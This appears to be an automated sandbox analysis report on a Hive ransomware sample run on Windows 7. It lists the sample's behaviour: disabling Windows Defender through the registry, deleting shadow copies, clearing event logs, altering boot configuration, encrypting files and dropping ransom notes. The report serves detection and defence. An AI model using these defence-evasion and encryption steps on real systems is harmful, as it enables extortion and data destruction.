Analysis Overview
SHA256
1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498
Threat Level: Known bad
The file ransomware.exe was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies security service
Deletes Windows Defender Definitions
Modifies Windows Defender Real-time Protection settings
Deletes shadow copies
Clears Windows event logs
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Opens file in notepad (likely ransom note)
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-23 08:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-23 08:33
Reported
2022-03-23 08:40
Platform
win7-20220311-en
Max time kernel
4294202s
Max time network
130s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\ProtectSelect.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SkipDebug.png => C:\Users\Admin\Pictures\SkipDebug.png.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GetApprove.tiff => C:\Users\Admin\Pictures\GetApprove.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OutSend.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SendCheckpoint.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DisableCompare.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PingImport.tif => C:\Users\Admin\Pictures\PingImport.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ProtectSelect.tiff => C:\Users\Admin\Pictures\ProtectSelect.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RevokeOut.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ShowOpen.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StopSync.crw => C:\Users\Admin\Pictures\StopSync.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SkipDebug.png.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DisableCompare.tif => C:\Users\Admin\Pictures\DisableCompare.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PingImport.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeOut.tiff => C:\Users\Admin\Pictures\RevokeOut.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ShowOpen.raw => C:\Users\Admin\Pictures\ShowOpen.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SendCheckpoint.raw => C:\Users\Admin\Pictures\SendCheckpoint.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\StopSync.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SubmitReceive.raw => C:\Users\Admin\Pictures\SubmitReceive.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SubmitReceive.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GetApprove.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OutSend.crw => C:\Users\Admin\Pictures\OutSend.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200467.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PACBELL.NET.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PROGRAM.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\PREVIEW.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\THMBNAIL.PNG.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00231_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Shades of Blue.htm | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\ihr6_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ARFR\ihr6_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipBand.dll.mui | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\slideShow.css | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Panama.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Austin.eftx.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE.HXS.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\background.gif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\ihr6_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105292.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\utilityfunctions.js.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Singapore.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\.lastModified.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\PNG32.FLT.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00542_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZUSR12.ACCDU.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityMergeFax.Dotx.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File created | C:\Program Files\Microsoft Games\Mahjong\ja-JP\ihr6_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\ihr6_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-util-enumerations.xml_hidden.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RICEPAPR\RICEPAPR.INF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RES98.POC.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Detroit.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
